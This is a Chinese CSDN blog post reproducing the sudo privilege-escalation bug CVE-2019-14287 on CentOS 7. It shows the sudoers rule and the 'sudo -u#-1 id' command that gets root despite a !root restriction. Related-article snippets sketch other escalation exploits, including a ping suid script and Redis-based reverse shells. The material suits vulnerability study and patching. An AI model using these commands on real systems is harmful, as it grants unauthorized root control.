CentOS-7 普通用户sudo提权,获取最高权限--漏洞CVE-2019-14287

已于 2024-05-29 20:28:11 修改
阅读量628 收藏 10
点赞数 7
分类专栏: 漏洞复现 文章标签: centos linux 运维
于 2024-02-03 14:55:53 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74313947/article/details/136007761
版权
文章讨论了一种利用vim编辑/etc/sudoers文件的漏洞,描述了如何通过配置让普通用户tom在特定条件下执行具有root权限的命令,如id和whoami,最终可能获取系统的完全控制。
摘要由CSDN通过智能技术生成

这个漏洞可能会导致非特权用户以root用户的身份执行特权命令,进而获得系统的完全控制权限。

vim /etc/sudoers

使用用vim编辑器打开/etc/sudoers文件

加上下面这条配置

tom ALL=(ALL,!root) /usr/bin/id,/usr/bin/whoami

这个指令的意思是在tom账户登录的状态下,也就是普通用户而非最高管理员登录状态下,除了root用户其他用户都可以使用下面的id与whoami指令

然后使用切换成tom账户登录

su - tom

使用

sudo -l

sudo -u#-1 id

将uid改成0,一般只有root的uid可以为0

这样就可以在tom下拿到root完全控制权限

爱吃红薯拔丝的小鹿
关注
  • 7
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
centos7输入shell找不到命令_安全研究 | CentOS 7系统利用suid提权获取Root Shell
weixin_42413377的博客
12-08 629
一、操作目的和应用场景本文档介绍在CentOS 7系统中利用带有suid权限的程序提权从而获取root shell的方法。首先简单介绍suid的概念:Linux进程在运行的时候有以下三个UID:Real UID:执行该进程的用户的UID。Real UID只用于标识用户,不用于权限检查。Effective UID(EUID):进程执行时生效的UID。在对访问目标进行操作时,系统会检查EUI...
Centos5-6提权
08-13
linux提权,通常的流程是 拿到Webshell -> 传EXP/编译好的程序 或者各种脚本也行 -> 反弹连接 -> 运行提权 -> 获得root -> 创建后门 -> 内网渗透如社工/sync等渗透 先来从基础的EXP提权说起来吧
“Dirty COW”提权漏洞CentOS 7发布内核修复补丁
snow2know的博客
11-15 902
导读 今天,CentOS维护成员和项目负责人Jojnny Hughes在社区中发布公告称这款面向服务器基于Linux的操作系统–CentOS 7上线重大内核更新。在今天的CentOS Errata and Security Advisory 2016:2098公告中标记为“重要”,并要求现有CentOS 7用户务必尽快升级内核补丁包至kernel-3.10.0-327.36.3.el7.x86_64
centos上gdb的安装及给普通用户进行提权
k5426244的博客
04-11 3337
gdb的安装及使用
离线sudo升级
最新发布
Jerry杰的博客
06-12 220
Sudo权限绕过漏洞(CVE-2019-14287)Sudo缓冲区溢出漏洞(CVE-2021-3156)
linux7.0提权工具,CentOS 7系统配置sudo策略(附sudo提权演示)
weixin_42203424的博客
05-08 630
一、操作目的和应用场景某些应用系统维护人员为了工作方便,将普通用户设置为不需要输入口令即可以root身份执行任何命令。这是非常不安全的,因为一旦攻击者获得了普通账户的权限,即可在系统中执行任意指令。因此有必要制定适合于维护人员的sudo策略,使维护人员可以通过受到限制的超级用户权限处理业务上的问题,同时又不至于被攻击者利用从而对系统产生很大的伤害。下面是我的一点思考,与大家分享。二、平台及工具版本...
Centos普通用户提权至ROOT
weixin_30919919的博客
12-25 1505
1、利用/bin/ping的漏洞普通用户提权。(rws中的s) [root@localhost ~]# ls -l /bin/ping -rwsr-xr-x. 1 root root 40760 9月 26 2013 /bin/ping 2、执行以下代码即可: #!/bin/sh unset LD_AUDIT rm -r -f /tmp/exploit mkdir /t...
centos7普通用户提权
WFC1006848997的博客
01-12 5054
centos普通用户提权 测试系统版本:centos 7 Linux 3.10.0-1127.8.2.el7.x86_64 x86_64 GNU/Linux 需要先安装 gcc yum -y install gcc automake autoconf libtool make 开始提权 1.adduser test 2.passwd test 3.mkdir /tmp/exploit 4.ln -s /usr/bin/ping /tmp/exploit/target 5.exec 3< /
Centos7 下 redis 入侵实战 - root提权
DevOps海洋的渔夫@专栏
12-06 473
知识铺垫 Redis 还有几个奇怪的功能:Linux 有一个功能可以通过一个端口写到本地文件,如果我要写一个文件,而这个文件是木马,那就自动拉起了。如果写入自己签名的公钥,用自己的私钥解公钥,自己解自己的,所以直接替换公钥,就是通过 Redis。 那么下面来实战演练一下通过redis匿名登陆写入反弹shell 环境准备 首先启动一个允许匿名登陆的redis服务器。 [...
CentOS 7关于Linux Polkit本地权限提升漏洞CVE-2021-4034)的在线和离线的两种修复方式
liangtongning的博客
02-07 4077
CentOS 7关于Linux Polkit本地权限提升漏洞CVE-2021-4034)的在线和离线的两种修复方式 验证是否是安全版本 使用命令:rpm -qa polkit 安全版本是:polkit-0.112-26.el7_9.1.x86_64,低于这个版本都不是安全版本 一、在线修复方式(需要可以连接外网) 使用命令 ①yum clean all && yum makecache ②yum update polkit -y 二、离线修复方式(适用内网服务器) ①下载离线包:http
CentOS 7系统配置sudo策略(附sudo提权演示
zz_strive_2012的专栏
07-24 888
https://www.freebuf.com/articles/system/243526.html 一、操作目的和应用场景 某些应用系统维护人员为了工作方便,将普通用户设置为不需要输入口令即可以root身份执行任何命令。这是非常不安全的,因为一旦攻击者获得了普通账户的权限,即可在系统中执行任意指令。因此有必要制定适合于维护人员的sudo策略,使维护人员可以通过受到限制的超级用户权限处理业务上的问题,同时又不至于被攻击者利用从而对系统产生很大的伤害。下面是我的一点思考,与大家分享。 二、平台及工具版
centos7.9:Linux polkit本地权限提升漏洞(CVE-2021-4034)修复
QT5 + PYQT5 + PYTHON3.3.2 最强组合 无敌了
02-17 3373
设置yum源为阿里云的: 添加软件源 (aliyun.com) 版本漏洞验证 通过以下命令可查看Polkit工具是否为安全版本 rpm -qa polkit 输出polkit-0.112-26.el7_9.1.x86_64 以上是不安全的版本Polkit 然后执行安装polkit最新安全版本: yum update polkit -y 更新完成后,在输入 rpm -qa polkit进行检查. 输出polkit-0.112-26.el7_9.1.x86_64 ...
Linux曝出Sudo提权漏洞 任意用户亦可运行root命令
01-10
作为 Linux 中最常使用的重要实用程序之一,Sudo 几乎安装在每一款 UNIX 和 Linux 发行版上,以便用户调用和实施核心命令。 然而近期曝出的一个提权漏洞,却直指 sudo 的一个安全策略隐患 —— 即便配置中明确不允许 root 用户访问,该漏洞仍可允许恶意用户或程序,在目标 Linux 系统上以 root 用户身份执行任意命令。 (题图 via Hacker News ) 据悉,Sudo 特指“超级用户”。作为一个系统命令,其允许用户以特殊权限来运行程序或命令,而无需切换使用环境(通常以 root 用户身份运行命令)。 默认情况下,在大多数 Linux 发行版中(如屏幕快照
Linux 提权 exp 大全
03-15
linux提权exp 集成现在几乎所有的exp 还有反弹shell脚本 pl版的反弹和.C文件的反弹
CentOS用户提权的技术实现summary
kigskylgt的博客
08-29 1062
在传统的Unix权限模型中,进程要么是普通用户,要么是超级用户(root),而超级用户具有系统上所有资源的完全控制权。"Capability" 是一种更细粒度的权限控制方式,它允许进程只获得执行特定操作所需的权限,而不需要完整的超级用户权限。在 CentOS(一种基于Red Hat Enterprise LinuxLinux发行版)中,用户提权是指从一个普通用户权限升级为超级用户(root)权限的过程。:在容器环境中,可能需要容器管理器(如Docker)能够终止容器内的进程,以便进行管理和资源释放。
CentOS 7系统安全之用户切换与提权
bccyrd0104的博客
08-27 656
一、su命令——切换用户使用su 命令可以切换为指定的另一个用户,从而具有该用户的所有权限。当切换时需要对目标用户的密码进行验证( root 用户切换其他用户时除外)。如图我们在root用户下执行“su - lisi”命令可以直接切换到lisi用户,然而我们在lisi用户下切换root 用户就需要数密码,若我们知晓密码便可直接切换root用户。上述命令操作中,选项“-”表示切换用户后进入目标用户的...
centos漏洞系列(三):Google Android libnl权限提升漏洞
gosenkle的专栏
05-16 685
1、介绍Google Android是一款基于Linux开放性内核的手机操作系统。Google Android在libnl组件实现上存在安全漏洞,允许远程攻击者利用漏洞构建特殊的应用,可提升权限。2、解决方案yum update libnl3yum update libnl3-cliyum update NetworkManageryum update NetworkManager-libnmyu...
CVE-2023-1829】Linux Kernel权限提升漏洞CVE-2023-1829)centos7解决方案
西原一点红的博客
06-28 2192
如果你需要进行内核模块的开发或构建,你可能需要安装 kernel-lt-headers 和 kernel-lt-devel 包。而如果你只是想安装最新的长期支持内核版本,你可以直接安装 kernel-lt 包。kernel-ml 中的ml是英文【 mainline stable 】的缩写,elrepo-kernel中罗列出来的是最新的稳定主线版本。kernel-lt 中的lt是英文【 long term support 】的缩写,elrepo-kernel中罗列出来的长期支持版本。B. 与当前版本差异小。
Haxx curl 输入验证错误漏洞(CVE-2019-15601)
07-27
根据提供的引用内容,Haxxcurl存在输入验证错误漏洞(CVE-2019-15601)。这个漏洞源于Haxxcurl在处理URL时未正确验证输入数据,导致攻击者可以利用该漏洞来执行恶意操作,例如覆盖本地文件。\[1\]为了解决这个漏洞,建议升级到Haxxcurl的7.71.0版本或更高版本。\[1\]此外,还需要注意其他相关的安全漏洞,比如Apache Tomcat的安全漏洞(CVE-2021-25122)。\[2\]同时,Haxx libcurl中也存在缓冲区错误漏洞,攻击者可以利用该漏洞导致缓冲区溢出或堆溢出等。\[3\]因此,为了确保系统的安全性,建议及时更新相关软件和库,并采取其他安全措施来保护系统免受潜在的攻击。 #### 引用[.reference_title] - *1* [漏洞修复--Haxx curl 安全漏洞 (CVE-2020-8177)](https://blog.csdn.net/qq_29974229/article/details/127864842)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [Centos7系统安全漏洞及修复方案](https://blog.csdn.net/Sara_cloud/article/details/115456192)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

爱吃红薯拔丝的小鹿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值